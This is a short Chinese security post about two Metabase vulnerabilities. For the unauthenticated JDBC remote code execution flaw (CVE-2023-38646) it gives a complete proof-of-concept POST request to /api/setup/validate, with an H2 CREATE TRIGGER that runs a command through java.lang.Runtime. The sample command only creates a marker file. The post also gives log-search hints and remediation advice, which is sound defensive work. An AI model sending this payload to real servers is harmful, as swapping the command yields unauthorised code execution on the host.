
30 6 月, 2024

(CVE-2021-41277)(CVE-2023-38646)

Metabase任意文件读取漏洞(CVE-2021-41277)

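Metabase未授权JDBC远程代码执行漏洞(CVE-2023-38646)

下面的请求是该漏洞的验证示例:请求未携带任何登录凭据,直接向 /api/setup/validate 提交 engine 为 h2 的数据库连接参数,其中 init 字段内的 CREATE TRIGGER 语句会在服务端校验连接时被执行(示例命令仅在 /tmp 下创建一个标记文件)。排查时可在访问日志中检索对 /api/setup/validate 的 POST 请求,并关注请求体中同时出现 "engine": "h2" 与 CREATE TRIGGER、java.lang.Runtime 等字样的记录;修复方式为升级到官方已修复的版本,并限制该接口的外部访问。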

POST /api/setup/validate HTTP/1.1
Cache-Control: max-age=0
Content-Type: application/json

{"token": "bea59bf9-e296-4c5a-8320-268f5b39157d",
    "details":{ "is_on_demand": false, "is_full_sync": false,
        "is_sample": false, "cache_ttl": null, "refingerprint": false,
        "auto_run_queries": true, "schedules": {},
        "details":{"db": "zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;",
            "advanced-options": false,"ssl": true,
"init": "CREATE TRIGGER shell3 BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\u000A\u0009java.lang.Runtime.getRuntime().exec('touch /tmp/success')\u000A$$" }, "name": "an-sec-research-team", "engine": "h2"}}